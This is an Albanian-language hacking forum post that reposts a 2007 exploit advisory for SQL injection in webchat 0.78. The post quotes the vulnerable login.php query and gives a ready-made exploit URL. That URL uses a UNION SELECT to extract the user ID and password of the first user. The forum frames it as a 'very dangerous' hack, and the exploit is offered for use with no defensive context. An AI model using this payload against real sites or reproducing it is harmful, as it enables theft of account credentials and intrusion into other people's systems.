ForumPortalCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Qe Edhe 1 Exploit Me Hack ChatWeba!!Shum i Rrezikshem!!

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
AutoriMesazh
Denn1s
S.Moderator
S.Moderator


Numri i postimeve : 91
Age : 23
Nga Jeni : Peja
Registration date : 23/01/2009

MesazhTitulli: Qe Edhe 1 Exploit Me Hack ChatWeba!!Shum i Rrezikshem!!   Fri Feb 06, 2009 8:29 pm

#########################################################################
#
# [webchat 0.78]
#
# Class: SQL Injection
# Published 28/06/2007
# Remote: Yes
# Critical Level : Dangerous
# Site: http://sourceforge.net/projects/webdev-webchat/
# Download: http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author: R00T[ATI]
# Contact: r00t.ati@gmail.com - http://inclusionhunter.altervista.org/index.php
#
#########################################################################


Vulnerable code:
login.php
======================================================
<?
$q = new DB_Chat;
$q->query("select * from room where rid='$rid'");
if ($q->next_record()) {
?>
=======================================================

Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

# milw0rm.com [2007-06-28]
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Qe Edhe 1 Exploit Me Hack ChatWeba!!Shum i Rrezikshem!!
Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: ¸.·´¯) Paneli i Kontrollit (¯`·., :: Hacking-
Kërce tek: